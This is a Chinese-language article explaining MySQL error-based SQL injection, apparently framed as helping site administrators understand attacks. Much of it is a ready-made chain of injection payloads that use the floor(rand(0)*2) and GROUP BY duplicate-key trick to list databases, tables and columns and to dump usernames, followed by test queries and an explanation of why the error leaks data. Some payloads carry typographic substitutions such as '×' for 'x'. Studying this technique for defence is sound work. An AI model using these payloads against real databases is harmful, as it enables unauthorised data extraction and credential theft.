深入分析MySql 報錯注入原理分析

最近在查看服務器安全時發現有大量的各種注入sql了，在這裡小編在網上整理了一些關於黑客常用的一些MySql注入的寫法供各位學習讓大家更清楚如何注入從而讓網站安全做得更到位。

看了一下關於mysql報錯注入的技術文章，都是通過類似以下的語句進行注入的。這樣的語句被稱為公式“公式”，好多小菜都是拿來直接用，不知道為什麼會是這樣。可是偏偏有我這種二貨一定要搞明白這幾句。

先來看看注入的全過程：

admin’ union select 1 from (select count(*),concat(floor(rand(0)*2),(select user() limit 0,1))a from information_schema.tables group by a)b#

爆所有庫

and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0×27,schema_name,0×27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

爆當前數據庫

username=-99999999999′ and(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,hex(cast(database() as char)),0×27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

爆表

and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0×27,hex(cast(table_name as char)),0×27,0x7e) from information_schema.tables where table_schema=0x64656D6F limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

爆字段

and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0×27,column_name,0×27,0x7e) from information_schema.columns where table_schema=0x64656D6F and table_name=0×75736572 limit 0,1)) from

information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

爆內容

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0×27,user.username,0×27,0x7e) from user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

爆出內容目的就達到了，這些語句讓我最無法理解的就是floor(rand(0)*2))，group by x，完全不知道拿出來是做什麼的。

查相關資料在mysql官方介紹中找到答案：
RAND() in a WHERE clause is re-evaluated every time the WHERE is executed.
You cannot use a column with RAND() values in an ORDER BY clause, because ORDER BY would evaluate the column multiple times.

意思就是不能再ORDER BY 中使用 RAND() 了。

那就也不能用GROUP BY了。。

用了就會報錯了。

admin’ union select 1 from (select count(*),concat(floor(rand(0)*2),(select user() limit 0,1))a from information_schema.tables group by a)b#
a為：concat(floor(rand(0)*2),(select user() limit 0,1))

有rand，後面又出現group by a語句，所以就報錯了Duplicate entry ‘root‘ for key ‘group_key’
而這裡的“’XXXXXXXXXX”就是 user()的內容，這樣就有了用戶名。

可以進行如下的測試：
報錯的：
SELECT id FROM keyword WHERE id=1 UNION SELECT 1 FROM (SELECT COUNT(*),CONCAT(FLOOR(RAND(0)*2),(SELECT CONCAT(0x5f,DATABASE(),0x5f,USER(),0x5f,VERSION())))a FROM information_schema.tables GROUP BY a)b–

去掉rand後沒有報錯：
SELECT id FROM keyword WHERE id=1 UNION SELECT 1 FROM (SELECT COUNT(*),CONCAT(0,(SELECT CONCAT(0x5f,DATABASE(),0x5f,USER(),0x5f,VERSION())))a FROM information_schema.tables GROUP BY a)b–

去掉GROUP BY a 後沒有報錯：
SELECT id FROM keyword WHERE id=1 UNION SELECT 1 FROM (SELECT COUNT(*),CONCAT(FLOOR(RAND(0)*2),(SELECT CONCAT(0x5f,DATABASE(),0x5f,USER(),0x5f,VERSION())))a FROM information_schema.tables )b–